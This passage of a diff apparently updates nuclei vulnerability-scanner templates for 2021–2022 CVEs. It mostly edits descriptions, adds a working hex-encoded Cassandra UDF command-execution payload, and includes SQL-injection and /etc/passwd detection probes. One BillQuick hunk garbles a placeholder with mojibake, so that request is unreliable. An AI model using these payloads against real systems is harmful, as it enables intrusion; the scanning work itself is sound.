    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773
    - https://twitter.com/ptswarm/status/1445376079548624899
    - https://twitter.com/h4x0r_dz/status/1445401960371429381
    - https://github.com/blasty/CVE-2021-41773
@ -45,3 +47,5 @@ requests:
        name: RCE
        words:
          - "CVE-2021-41773-POC"
 # Enhanced by mp on 2022/02/27
--- a/cves/2021/CVE-2021-41826.yaml
+++ b/cves/2021/CVE-2021-41826.yaml
@ -4,7 +4,7 @@ info:
  name: PlaceOS 1.2109.1 - Open Redirection
  author: geeknik
  severity: medium
-  description: PlaceOS Authentication Service before 1.29.10.0 allows app/controllers/auth/sessions_controller.rb open redirect
+  description: PlaceOS Authentication Service before 1.29.10.0 allows app/controllers/auth/sessions_controller.rb open redirect.
  reference:
    - https://github.com/PlaceOS/auth/issues/36
    - https://www.exploit-db.com/exploits/50359
@ -34,3 +34,5 @@ requests:
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
 # Enhanced by mp on 2022/02/27
--- a/cves/2021/CVE-2021-41878.yaml
+++ b/cves/2021/CVE-2021-41878.yaml
@ -1,11 +1,12 @@
 id: CVE-2021-41878
 info:
-  name: i-Panel Administration System - Reflected XSS
+  name: i-Panel Administration System - Reflected Cross-Site Scripting
  author: madrobot
  severity: medium
-  description: A reflected cross-site scripting (XSS) vulnerability exists in the i-Panel Administration System Version 2.0 that enables a remote attacker to execute arbitrary JavaScript code in the browser-based web console.
+  description: A reflected cross-site scripting vulnerability exists in the i-Panel Administration System Version 2.0 that enables a remote attacker to execute arbitrary JavaScript code in the browser-based web console.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-41878
    - https://cybergroot.com/cve_submission/2021-1/XSS_i-Panel_2.0.html
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41878
  classification:
@ -35,3 +36,5 @@ requests:
        words:
          - "text/html"
        part: header
 # Enhanced by mp on 2022/02/27
--- a/cves/2021/CVE-2021-41951.yaml
+++ b/cves/2021/CVE-2021-41951.yaml
@ -1,9 +1,9 @@
 id: CVE-2021-41951
 info:
-  name: Resourcespace - Reflected XSS
+  name: Resourcespace - Reflected Cross-Site Scripting
  author: coldfish
-  description: ResourceSpace before 9.6 rev 18290 is affected by a reflected Cross-Site Scripting vulnerability in plugins/wordpress_sso/pages/index.php via the wordpress_user parameter.
+  description: ResourceSpace before 9.6 rev 18290 is affected by a reflected cross-site scripting vulnerability in plugins/wordpress_sso/pages/index.php via the wordpress_user parameter.
  severity: medium
  tags: cve,cve2021,xss,resourcespace
  reference:
@ -33,4 +33,6 @@ requests:
      - type: status
        status:
-          - 200
+          - 200
 # Enhanced by mp on 2022/02/27
--- a/cves/2021/CVE-2021-42013.yaml
+++ b/cves/2021/CVE-2021-42013.yaml
@ -4,8 +4,10 @@ info:
  name: Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution
  author: nvn1729,0xd0ff9
  severity: critical
-  description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. In certain configurations, for instance if mod_cgi is enabled, this flaw can lead to remote code execution. This issue only affects Apache 2.4.49 and 2.4.50 and not earlier versions. Note - CVE-2021-42013 is due to an incomplete fix for the original vulnerability CVE-2021-41773.
+  description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. In certain configurations, for instance if mod_cgi is enabled, this flaw can lead to remote code execution. This issue only affects Apache 2.4.49 and 2.4.50 and not earlier versions. Note - CVE-2021-42013 is due to an incomplete fix for the original vulnerability CVE-2021-41773.
  remediation: Upgrade to Apache HTTP Server 2.4.51 or later.
  reference:
    - https://httpd.apache.org/security/vulnerabilities_24.html
    - https://github.com/apache/httpd/commit/5c385f2b6c8352e2ca0665e66af022d6e936db6d
    - https://nvd.nist.gov/vuln/detail/CVE-2021-42013
    - https://twitter.com/itsecurityco/status/1446136957117943815
@ -44,3 +46,5 @@ requests:
        name: RCE
        words:
          - "CVE-2021-42013"
 # Enhanced by mp on 2022/02/27
--- a/cves/2021/CVE-2021-42258.yaml
+++ b/cves/2021/CVE-2021-42258.yaml
@ -1,17 +1,11 @@
 id: CVE-2021-42258
 info:
-  name: BillQuick Web Suite SQLi
+  name: BillQuick Web Suite SQL Injection
  author: dwisiswant0
  severity: critical
  tags: cve,cve2021,sqli,billquick
-  description: |
+  description: BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1 allows SQL injection for unauthenticated remote code execution. Successful exploitation can include the ability to execute arbitrary code as MSSQLSERVER$ via xp_cmdshell.
    BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1
    allows SQL injection for unauthenticated remote code execution,
    as exploited in the wild in October 2021 for ransomware installation.
    SQL injection can, for example, use the txtID (aka username) parameter.
    Successful exploitation can include the ability to execute
    arbitrary code as MSSQLSERVER$ via xp_cmdshell.
  reference:
    - https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware
    - https://nvd.nist.gov/vuln/detail/CVE-2021-42258
@ -34,7 +28,7 @@ requests:
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
-        __EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("§VS§")}}&__VIEWSTATEGENERATOR={{url_encode("§VSG§")}}&__EVENTVALIDATION={{url_encode("§EV§")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96
+        __EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("Â§VSÂ§")}}&__VIEWSTATEGENERATOR={{url_encode("Â§VSGÂ§")}}&__EVENTVALIDATION={{url_encode("Â§EVÂ§")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96
    cookie-reuse: true
    extractors:
@ -67,3 +61,5 @@ requests:
          - "System.Data.SqlClient.SqlException"
          - "Incorrect syntax near"
          - "_ACCOUNTLOCKED"
 # Enhanced by mp on 2022/02/27
--- a/cves/2021/CVE-2021-42551.yaml
+++ b/cves/2021/CVE-2021-42551.yaml
@ -1,13 +1,13 @@
 id: CVE-2021-42551
 info:
-  name: NetBiblio WebOPAC - Reflected XSS
+  name: NetBiblio WebOPAC - Reflected Cross-Site Scripting
  author: compr00t
  severity: medium
-  description: NetBiblio WebOPAC before 4.0.0.320 is affected by a reflected Cross-Site Scripting vulnerability in its Wikipedia modul through /NetBiblio/search/shortview via the searchTerm parameter.
+  description: NetBiblio WebOPAC before 4.0.0.320 is affected by a reflected cross-site scripting vulnerability in its Wikipedia module through /NetBiblio/search/shortview via the searchTerm parameter.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-42551
    - https://www.redguard.ch/advisories/netbiblio_webopac.txt
    - https://www.cve.org/CVERecord?id=CVE-2021-42551
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.10
@ -45,3 +45,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/27
--- a/cves/2021/CVE-2021-42565.yaml
+++ b/cves/2021/CVE-2021-42565.yaml
@ -2,11 +2,11 @@ id: CVE-2021-42565
 info:
  author: madrobot
-  name: myfactory FMS  -  Reflected XSS
+  name: myfactory FMS  -  Reflected Cross-Site Scripting
  severity: medium
-  description: myfactory.FMS before 7.1-912 allows XSS via the UID parameter.
+  description: myfactory.FMS before 7.1-912 allows cross-site scripting via the UID parameter.
  reference:
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-42566
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-42565
    - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@ -37,3 +37,5 @@ requests:
        part: header
        words:
          - "text/html"
 # Enhanced by mp on 2022/02/27
--- a/cves/2021/CVE-2021-42566.yaml
+++ b/cves/2021/CVE-2021-42566.yaml
@ -1,11 +1,12 @@
 id: CVE-2021-42566
 info:
-  name: myfactory FMS  -  Reflected XSS
+  name: myfactory FMS  -  Reflected Cross-Site Scripting
  author: madrobot
  severity: medium
-  description: myfactory.FMS before 7.1-912 allows XSS via the Error parameter.
+  description: myfactory.FMS before 7.1-912 allows cross-site scripting via the Error parameter.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-42566
    - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-42566
  classification:
@ -37,3 +38,5 @@ requests:
        part: header
        words:
          - "text/html"
 # Enhanced by mp on 2022/02/28
--- a/cves/2021/CVE-2021-42567.yaml
+++ b/cves/2021/CVE-2021-42567.yaml
@ -1,10 +1,10 @@
 id: CVE-2021-42567
 info:
-  name: Apereo CAS Reflected XSS
+  name: Apereo CAS Reflected Cross-Site Scripting
  author: pdteam
  severity: medium
-  description: Apereo CAS through 6.4.1 allows XSS via POST requests sent to the REST API endpoints.
+  description: Apereo CAS through 6.4.1 allows cross-site scripting via POST requests sent to the REST API endpoints.
  reference:
    - https://apereo.github.io/2021/10/18/restvuln/
    - https://www.sudokaikan.com/2021/12/exploit-cve-2021-42567-post-based-xss.html
@ -40,3 +40,5 @@ requests:
      - type: status
        status:
          - 401
 # Enhanced by mp on 2022/02/28
--- a/cves/2021/CVE-2021-43062.yaml
+++ b/cves/2021/CVE-2021-43062.yaml
@ -1,10 +1,10 @@
 id: CVE-2021-43062
 info:
-  name: Fortinet Fortimail 7.0.1 - Reflected XSS
+  name: Fortinet FortiMail 7.0.1 - Reflected Cross-Site Scripting
  author: ajaysenr
  severity: medium
-  description: An improper neutralization of input during web page generation vulnerability ('Cross-site Scripting') [CWE-79] in FortiMail may allow an unauthenticated attacker to perform an XSS attack via crafted HTTP GET requests to the FortiGuard URI protection service.
+  description: A cross-site scripting vulnerability in FortiMail may allow an unauthenticated attacker to perform an attack via specially crafted HTTP GET requests to the FortiGuard URI protection service.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-43062
    - https://www.fortiguard.com/psirt/FG-IR-21-185
@ -38,3 +38,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/28
--- a/cves/2021/CVE-2021-43287.yaml
+++ b/cves/2021/CVE-2021-43287.yaml
@ -4,6 +4,8 @@ info:
  name: Pre-Auth Takeover of Build Pipelines in GoCD
  author: dhiyaneshDk
  severity: critical
  description: GoCD contains a critical information disclosure vulnerability whose exploitation allows unauthenticated attackers to leak configuration information including build secrets and encryption keys.
  remediation: Upgrade to version v21.3.0. or later.
  reference:
    - https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50
    - https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover
@ -11,6 +13,8 @@ info:
  tags: cve,cve2021,go,lfi,gocd,takeover
  metadata:
    shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version"
  classification:
    cve-id: CVE-2021-43287
 requests:
  - method: GET
@ -26,3 +30,5 @@ requests:
      - type: regex
        regex:
          - "root:.*:0:0:"
 # Enhanced by mp on 2022/02/28
--- a/cves/2021/CVE-2021-43495.yaml
+++ b/cves/2021/CVE-2021-43495.yaml
@ -1,10 +1,10 @@
 id: CVE-2021-43495
 info:
-  name: AlquistManager lfi
+  name: AlquistManager Local File Inclusion
  author: pikpikcu
  severity: high
-  description: AlquistManager branch as of commit 280d99f43b11378212652e75f6f3159cde9c1d36 is affected by a directory traversal vulnerability in alquist/IO/input.py
+  description: AlquistManager branch as of commit 280d99f43b11378212652e75f6f3159cde9c1d36 is affected by a directory traversal vulnerability in alquist/IO/input.py. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.
  reference:
    - https://github.com/AlquistManager/alquist/issues/43
    - https://nvd.nist.gov/vuln/detail/CVE-2021-43495
@ -25,3 +25,5 @@ requests:
        regex:
          - "root:.*:0:0:"
        part: body
 # Enhanced by mp on 2022/02/28
--- a/cves/2021/CVE-2021-43496.yaml
+++ b/cves/2021/CVE-2021-43496.yaml
@ -1,7 +1,7 @@
 id: CVE-2021-43496
 info:
-  name: Clustering LFI
+  name: Clustering Local File Inclusion
  author: Evan Rubinstein
  severity: high
  description: Clustering master branch as of commit 53e663e259bcfc8cdecb56c0bb255bd70bfcaa70 is affected by a directory traversal vulnerability. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.
@ -25,3 +25,5 @@ requests:
        part: body
        regex:
          - "root:.*:0:0:"
 # Enhanced by mp on 2022/02/28
--- a/cves/2021/CVE-2021-43778.yaml
+++ b/cves/2021/CVE-2021-43778.yaml
@ -1,10 +1,11 @@
 id: CVE-2021-43778
 info:
-  name: GLPI plugin Barcode < 2.6.1 path traversal vulnerability.
+  name: GLPI plugin Barcode < 2.6.1 Path Traversal Vulnerability.
  author: cckuailong
  severity: critical
-  description: Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability. This issue was patched in version 2.6.1. As a workaround, delete the `front/send.php` file..
+  description: Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability.
  remediation: Upgrade to version 2.6.1 or later. Or, as a workaround, delete the `front/send.php` file.
  reference:
    - https://github.com/AK-blank/CVE-2021-43778
    - https://nvd.nist.gov/vuln/detail/CVE-2021-43778
@ -28,3 +29,5 @@ requests:
      - type: regex
        regex:
          - "root:.*:0:0"
 # Enhanced by mp on 2022/02/28
--- a/cves/2021/CVE-2021-43798.yaml
+++ b/cves/2021/CVE-2021-43798.yaml
@ -4,8 +4,8 @@ info:
  name: Grafana v8.x Arbitrary File Read
  author: z0ne,dhiyaneshDk
  severity: high
-  description: Grafana is an open-source analytics and monitoring application. Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `<grafana_host_url>/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin.
+  description: Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `<grafana_host_url>/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin.
-  remediation: Upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1. The GitHub Security Advisory contains more information about vulnerable URL paths, mitigation, and the disclosure timeline.
+  remediation: Upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1.
  reference:
    - https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
    - https://nosec.org/home/detail/4914.html
@ -34,4 +34,4 @@ requests:
        status:
          - 200
-# Enhanced by cs on 2022/02/18
+# Enhanced by mp on 2022/02/28
--- a/cves/2021/CVE-2021-43810.yaml
+++ b/cves/2021/CVE-2021-43810.yaml
@ -1,10 +1,11 @@
 id: CVE-2021-43810
 info:
-  name: Admidio - Reflected XSS
+  name: Admidio - Reflected Cross-Site Scripting
  author: gy741
  severity: medium
-  description: Admidio is a free open source user management system for websites of organizations and groups. A cross-site scripting vulnerability is present in Admidio prior to version 4.0.12. The Reflected XSS vulnerability occurs because redirect.php does not properly validate the value of the url parameter. Through this vulnerability, an attacker is capable to execute malicious scripts. This issue is patched in version 4.0.12.
+  description: A cross-site scripting vulnerability is present in Admidio prior to version 4.0.12. The reflected cross-site scripting vulnerability occurs because redirect.php does not properly validate the value of the url parameter. Through this vulnerability, an attacker is capable to execute malicious scripts.
  remediation: Upgrade to version 4.0.12 or later.
  reference:
    - https://github.com/Admidio/admidio/security/advisories/GHSA-3qgf-qgc3-42hh
    - https://nvd.nist.gov/vuln/detail/CVE-2021-43810
@ -36,3 +37,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/28
--- a/cves/2021/CVE-2021-44228.yaml
+++ b/cves/2021/CVE-2021-44228.yaml
@ -1,11 +1,14 @@
 id: CVE-2021-44228
 info:
-  name: Remote code injection in Log4j
+  name: Apache Log4j2 Remote Code Injection
  author: melbadry9,dhiyaneshDK,daffainfo,anon-artist,0xceba,Tea
  severity: critical
  description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
  remediation: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later).
  reference:
    - https://logging.apache.org/log4j/2.x/security.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
    - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
    - https://www.lunasec.io/docs/blog/log4j-zero-day/
    - https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a
@ -68,3 +71,5 @@ requests:
        group: 1
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output
 # Enhanced by mp on 2022/02/28
--- a/cves/2021/CVE-2021-44427.yaml
+++ b/cves/2021/CVE-2021-44427.yaml
@ -4,7 +4,7 @@ info:
  name: Rosario Student Information System Unauthenticated SQL Injection
  author: furkansayim,xShuden
  severity: critical
-  description: An unauthenticated SQL Injection vulnerability in Rosario Student Information System (aka rosariosis) 8.1 and below allow remote attackers to execute PostgreSQL statements (e.g., SELECT, INSERT, UPDATE, and DELETE) through /Side.php via the syear parameter.
+  description: An unauthenticated SQL injection vulnerability in Rosario Student Information System (aka rosariosis) 8.1 and below allow remote attackers to execute PostgreSQL statements (e.g., SELECT, INSERT, UPDATE, and DELETE) through /Side.php via the syear parameter.
  remediation: Upgrade to version 8.1.1 or higher.
  reference:
    - https://gitlab.com/francoisjacquet/rosariosis/-/issues/328
@ -42,3 +42,5 @@ requests:
        part: header
        words:
          - "RosarioSIS="
 # Enhanced by mp on 2022/02/28
--- a/cves/2021/CVE-2021-44521.yaml
+++ b/cves/2021/CVE-2021-44521.yaml
@ -0,0 +1,56 @@
 id: CVE-2021-44521
 info:
  name: Apache Cassandra Load UDF RCE
  author: Y4er
  description: "When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE."
  severity: critical
  reference:
    - https://y4er.com/post/cve-2021-44521-apache-cassandra-udf-rce/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44521
  tags: cve,cve2021,network,rce,apache,cassandra
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.10
    cve-id: CVE-2021-44521
    cwe-id: CWE-94
 network:
  - inputs:
      - data: "050000000500000000"
        read: 1024
        type: hex
      - data: "0500000101000000530003000b4452495645525f4e414d450016446174615374617820507974686f6e20447269766572000e4452495645525f56455253494f4e0006332e32352e30000b43514c5f56455253494f4e0005332e342e35"
        read: 1024
        type: hex
      - data: "3e000218aeb50500000307000000350000001d64726f70204b455953504143452049462045584953545320746573743b0001000000340000006400080005d82cc8ca0e4fcdde8c0a"
        read: 1024
        type: hex
      - data: "7f0002a6a69f0500000407000000760000005e435245415445204b4559535041434520746573742057495448207265706c69636174696f6e203d207b27636c617373273a202753696d706c655374726174656779272c20277265706c69636174696f6e5f666163746f7227203a20317d3b0001000000340000006400080005d82cc8ca390f0ddce06b"
        read: 1024
        type: hex
      - data: "7d000296664f0500000807000000740000005c435245415445205441424c4520746573742e7263652028636d642076617263686172205052494d415259204b455929205749544820636f6d6d656e743d27496d706f7274616e742062696f6c6f676963616c207265636f726473273b0001000000340000006400080005d82cc8cb2fc161951510"
        read: 1024
        type: hex
      - data: "1c030291ff34050000100700000313000002fb637265617465206f72207265706c6163652046554e4354494f4e20746573742e657865632820636d64207465787420290d0a2020202052455455524e53204e554c4c204f4e204e554c4c20494e5055540d0a2020202052455455524e5320746578740d0a202020204c414e4755414745206a6176617363726970740d0a2020202041532024240d0a202020207661722053797374656d203d204a6176612e7479706528226a6176612e6c616e672e53797374656d22293b53797374656d2e73657453656375726974794d616e61676572286e756c6c293b0d0a202020207661722065203d746869732e656e67696e652e666163746f72792e736372697074456e67696e652e6576616c2827766172206f736e616d65203d206a6176612e6c616e672e53797374656d2e67657450726f706572747928226f732e6e616d6522293b6f736e616d65203d206f736e616d652e746f4c6f7765724361736528293b7661722073706c6974203d206f736e616d652e73746172747357697468282277696e2229203f20222f6322203a20222d63223b76617220636d6450617468203d206f736e616d652e73746172747357697468282277696e2229203f2022636d6422203a202262617368223b76617220636f6d6d616e64203d2022272b636d642b27223b7661722073203d205b636d64506174682c2073706c69742c20636f6d6d616e645d3b70203d206a6176612e6c616e672e52756e74696d652e67657452756e74696d6528292e657865632873293b766172206272203d206e6577206a6176612e696f2e4275666665726564526561646572286e6577206a6176612e696f2e496e70757453747265616d52656164657228702e676574496e70757453747265616d282929293b766172207265733d22223b7768696c652028286c203d2062722e726561644c696e6528292920213d206e756c6c29207b202020207265732b3d6c3b7265732b3d6a6176612e6c616e672e53797374656d2e6c696e65536570617261746f7228293b7d27293b0d0a20202020653b0d0a2020202024243b0001000000340000006400080005d82cc8cc7ece89646c85"
        read: 1024
        type: hex
      - data: "51000278033505000014070000004800000030696e7365727420696e746f20746573742e72636528636d64292076616c75657328276563686f2031323331323327293b0001000000340000006400080005d82cc8cd5b810ef0b16e"
        read: 1024
        type: hex
      - data: "450002bff1d805000015070000003c0000002473656c65637420746573742e6578656328636d64292066726f6d20746573742e7263653b0001000000340000006400080005d82cc8cd99d444271281"
        read: 1024
        type: hex
      - data: "3e000218aeb50500000307000000350000001d64726f70204b455953504143452049462045584953545320746573743b0001000000340000006400080005d82cc8ca0e4fcdde8c0a"
        type: hex
        read: 1024
    host:
      - "{{Hostname}}"
      - "{{Host}}:9042"
    matchers:
      - type: word
        part: raw
        words:
          - "123123"
--- a/cves/2021/CVE-2021-44528.yaml
+++ b/cves/2021/CVE-2021-44528.yaml
@ -35,3 +35,5 @@ requests:
          - 302
          - 307
          - 308
 # Enhanced by mp on 2022/02/28
--- a/cves/2021/CVE-2021-44848.yaml
+++ b/cves/2021/CVE-2021-44848.yaml
@ -34,3 +34,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/28
--- a/cves/2021/CVE-2021-45043.yaml
+++ b/cves/2021/CVE-2021-45043.yaml
@ -1,10 +1,10 @@
 id: CVE-2021-45043
 info:
-  name: HD-Network Real-time Monitoring System 2.0 - Local File Inclusion
+  name: HD-Network Realtime Monitoring System 2.0 - Local File Inclusion
  author: Momen Eldawakhly,Evan Rubinstein
  severity: high
-  description: Instances of HD-Netowrk Real-time Monitoring System version 2.0 are vulnerable to a Local File Inclusion (LFI) vulnerability which allows remote unauthenticate attackers to view important, confidnetial information.
+  description: Instances of HD-Network Realtime Monitoring System version 2.0 are vulnerable to a Local File Inclusion vulnerability which allows remote unauthenticated attackers to view confidential information.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-45043
    - https://www.exploit-db.com/exploits/50588
@ -36,3 +36,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/28
--- a/cves/2021/CVE-2021-45046.yaml
+++ b/cves/2021/CVE-2021-45046.yaml
@ -1,10 +1,10 @@
 id: CVE-2021-45046
 info:
-  name: Remote code injection in Log4j
+  name: Apache Log4j2 Remote Code Injection
  author: ImNightmaree
  severity: critical
-  description: Apache Log4j2 Thread Context Lookup Pattern vulnerable to remote code execution in certain non-default configurations.
+  description: Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations.
  reference:
    - https://securitylab.github.com/advisories/GHSL-2021-1054_GHSL-2021-1055_log4j2/
    - https://twitter.com/marcioalm/status/1471740771581652995
@ -64,3 +64,5 @@ requests:
        group: 1
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output
 # Enhanced by mp on 2022/02/28
--- a/cves/2021/CVE-2021-45092.yaml
+++ b/cves/2021/CVE-2021-45092.yaml
@ -4,7 +4,7 @@ info:
  name: Thinfinity Iframe Injection
  author: danielmofer
  severity: critical
-  description: Thinfinity VirtualUI is a web remote desktop system, a vulnerability exist in a function located in /lab.html reachable by default that could allow IFRAME injection via the "vpath" parameter.
+  description: A vulnerability exists in Thinfinity VirtualUI in a function located in /lab.html reachable which by default  could allow IFRAME injection via the "vpath" parameter.
  reference:
    - https://github.com/cybelesoft/virtualui/issues/2
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44848
@ -26,4 +26,8 @@ requests:
        regex:
          - ".*vpath.*"
          - "thinfinity"
-        condition: and
+        condition: and
 # Enhanced by mp on 2022/02/28
 # Enhanced by mp on 2022/02/28
--- a/cves/2021/CVE-2021-45232.yaml
+++ b/cves/2021/CVE-2021-45232.yaml
@ -1,10 +1,11 @@
 id: CVE-2021-45232
 info:
-  name: Apache APISIX Dashboard api unauth access
+  name: Apache APISIX Dashboard API Unauthorized Access
  author: Mr-xn
  severity: critical
-  description: In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin`, all APIs and authentication middleware are developed based on framework `droplet`, but some API directly use the interface of framework `gin` thus bypassing the authentication.
+  description: In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin.' While all APIs and authentication middleware are developed based on framework `droplet`,  some API directly use the interface of framework `gin` thus bypassing their authentication.
  remediation: Upgrade to release 2.10.1 or later. Or, change the default username and password, and restrict the source IP to access the Apache APISIX Dashboard.
  reference:
    - https://apisix.apache.org/zh/blog/2021/12/28/dashboard-cve-2021-45232/
    - https://github.com/pingpongcult/CVE-2021-45232
@ -33,3 +34,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/28
--- a/cves/2021/CVE-2021-45380.yaml
+++ b/cves/2021/CVE-2021-45380.yaml
@ -1,10 +1,10 @@
 id: CVE-2021-45380
 info:
-  name: AppCMS - Reflected Cross-Site Scripting (XSS)
+  name: AppCMS - Reflected Cross-Site Scripting
  author: pikpikcu
  severity: medium
-  description: AppCMS 2.0.101 has a XSS injection vulnerability in \templates\m\inc_head.php
+  description: AppCMS 2.0.101 has a cross-site scripting vulnerability in \templates\m\inc_head.php.
  reference:
    - https://github.com/source-trace/appcms/issues/8
    - https://nvd.nist.gov/vuln/detail/CVE-2021-45380
@ -36,3 +36,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/28
--- a/cves/2021/CVE-2021-46005.yaml
+++ b/cves/2021/CVE-2021-46005.yaml
@ -1,10 +1,10 @@
 id: CVE-2021-46005
 info:
-  name: Sourcecodester Car Rental Management System 1.0 - Stored XSS
+  name: Sourcecodester Car Rental Management System 1.0 - Stored Cross-Site Scripting
  author: cckuailong
  severity: medium
-  description: Sourcecodester Car Rental Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via vehicalorcview parameter.
+  description: Sourcecodester Car Rental Management System 1.0 is vulnerable to cross-site scripting via the vehicalorcview parameter.
  reference:
    - https://www.exploit-db.com/exploits/49546
    - https://nvd.nist.gov/vuln/detail/CVE-2021-46005
@ -109,3 +109,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/28
--- a/cves/2022/CVE-2022-0149.yaml
+++ b/cves/2022/CVE-2022-0149.yaml
@ -1,11 +1,13 @@
 id: CVE-2022-0149
 info:
-  name: WooCommerce – Store Exporter < 2.7.1 - Reflected Cross-Site Scripting (XSS)
+  name: WooCommerce Stored Exporter WordPress Plugin < 2.7.1 - Reflected Cross-Site Scripting
  author: dhiyaneshDk
  severity: medium
-  description: The plugin was affected by a Reflected Cross-Site Scripting (XSS) vulnerability in the woo_ce admin page.
+  description: The plugin was affected by a reflected cross-site scripting vulnerability in the woo_ce admin page.
-  reference: https://wpscan.com/vulnerability/e47c288a-2ea3-4926-93cc-113867cbc77c
+  reference:
    - https://wpscan.com/vulnerability/e47c288a-2ea3-4926-93cc-113867cbc77c
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0149
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.10
@ -43,3 +45,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/28
--- a/cves/2022/CVE-2022-0218.yaml
+++ b/cves/2022/CVE-2022-0218.yaml
@ -1,10 +1,10 @@
 id: CVE-2022-0218
 info:
-  name: HTML Email Template Designer < 3.1 - Stored Cross-Site Scripting (XSS)
+  name: HTML Email Template Designer < 3.1 - Stored Cross-Site Scripting
  author: hexcat
  severity: medium
-  description: WordPress Email Template Designer WP HTML Mail allows stored XSS through an unprotected REST-API endpoint (CVE-2022-0218).
